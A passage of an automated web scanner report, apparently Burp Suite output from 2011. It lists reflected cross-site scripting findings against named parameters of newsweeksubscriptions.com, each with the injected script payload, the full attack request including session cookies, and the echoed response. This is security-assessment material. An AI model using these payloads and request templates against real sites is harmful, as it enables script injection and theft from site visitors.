Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.phpee8b8<script>alert(1)</script>15cf6cd2e68 is not found !</p>
...[SNIP]...

1.223. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18760<script>alert(1)</script>2fdacefe31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php/18760<script>alert(1)</script>2fdacefe31b HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php/18760<script>alert(1)</script>2fdacefe31b is not found !</p>
...[SNIP]...

1.224. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2f0a<script>alert(1)</script>0507321d56ca7bad9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrole2f0a<script>alert(1)</script>0507321d56ca7bad9/index.php?bill_state=&state= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:21 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 527
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole2f0a<script>alert(1)</script>0507321d56ca7bad9 is not found !</p>
...[SNIP]...

1.225. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e79bc<script>alert(1)</script>874d88a6ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrole79bc<script>alert(1)</script>874d88a6ba4/index.php HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 521
Connection: close
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole79bc<script>alert(1)</script>874d88a6ba4 is not found !</p>
...[SNIP]...

1.226. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 30811<script>alert(1)</script>cfd859f6c833810f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/30811<script>alert(1)</script>cfd859f6c833810f?bill_state=&state= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:51 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 779
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/30811<script>alert(1)</script>cfd859f6c833810f is not found !</p>
...[SNIP]...

1.227. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af631<script>alert(1)</script>29e38fed55d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/af631<script>alert(1)</script>29e38fed55d HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:23 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 774
Connection: close
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/af631<script>alert(1)</script>29e38fed55d is not found !</p>
...[SNIP]...

1.228. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the address request parameter is copied into the HTML document as plain text between tags. The payload d55cf<script>alert(1)</script>c5fd3f59eb2ff2768 was submitted in the address parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=d55cf<script>alert(1)</script>c5fd3f59eb2ff2768&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:37 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
d55cf<script>alert(1)</script>c5fd3f59eb2ff2768<br>
...[SNIP]...

1.229. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the address2 request parameter is copied into the HTML document as plain text between tags. The payload c64c8<script>alert(1)</script>4d4203c629d74c739 was submitted in the address2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=c64c8<script>alert(1)</script>4d4203c629d74c739&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:41 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20705


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
c64c8<script>alert(1)</script>4d4203c629d74c739<br>
...[SNIP]...

1.230. https://www.newsweeksubscriptions.com/FTcontrol/index.php [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the city request parameter is copied into the HTML document as plain text between tags. The payload cdee3<script>alert(1)</script>ed2a965c17315b456 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=cdee3<script>alert(1)</script>ed2a965c17315b456&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:46 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
cdee3<script>alert(1)</script>ed2a965c17315b456, AK <br>
...[SNIP]...

1.231. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c34ab'%3balert(1)//ef7adf60f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c34ab';alert(1)//ef7adf60f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TD/c34ab'%3balert(1)//ef7adf60f5eBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:42 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52795


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
;
       
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo';


url += '&off2on_code=TD/c34ab';alert(1)//ef7adf60f5eBNAV';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=
...[SNIP]...

1.232. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9da8a"><script>alert(1)</script>7daa882cfb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TD/9da8a"><script>alert(1)</script>7daa882cfb0BNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:38 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52825


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="TD/9da8a"><script>alert(1)</script>7daa882cfb0BNAV">
...[SNIP]...

1.233. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 3de41<script>alert(1)</script>0f40ef1362bbb5b0 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=3de41<script>alert(1)</script>0f40ef1362bbb5b0&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:32 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20700


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
3de41<script>alert(1)</script>0f40ef1362bbb5b0<br>
...[SNIP]...

1.234. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the off2on_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d39"><script>alert(1)</script>abae2437581 was submitted in the off2on_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TDBNAV63d39"><script>alert(1)</script>abae2437581 HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:13 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52823


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="TDBNAV63d39"><script>alert(1)</script>abae2437581">
...[SNIP]...

1.235. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the off2on_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fd5e'%3balert(1)//7e6518f439b was submitted in the off2on_code parameter. This input was echoed as 9fd5e';alert(1)//7e6518f439b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TDBNAV9fd5e'%3balert(1)//7e6518f439b HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:17 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52793


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
   
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo';


url += '&off2on_code=TDBNAV9fd5e';alert(1)//7e6518f439b';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=295,
...[SNIP]...

1.236. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33396"><script>alert(1)</script>3164ef74c97 was submitted in the off2on_login_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo33396"><script>alert(1)</script>3164ef74c97&off2on_code=TDBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:37:54 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52823


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_login_url" id="off2on_login_url" value="/promo33396"><script>alert(1)</script>3164ef74c97">
...[SNIP]...

1.237. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b713'%3balert(1)//66c9d26a207 was submitted in the off2on_login_url parameter. This input was echoed as 5b713';alert(1)//66c9d26a207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo5b713'%3balert(1)//66c9d26a207&off2on_code=TDBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:37:58 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
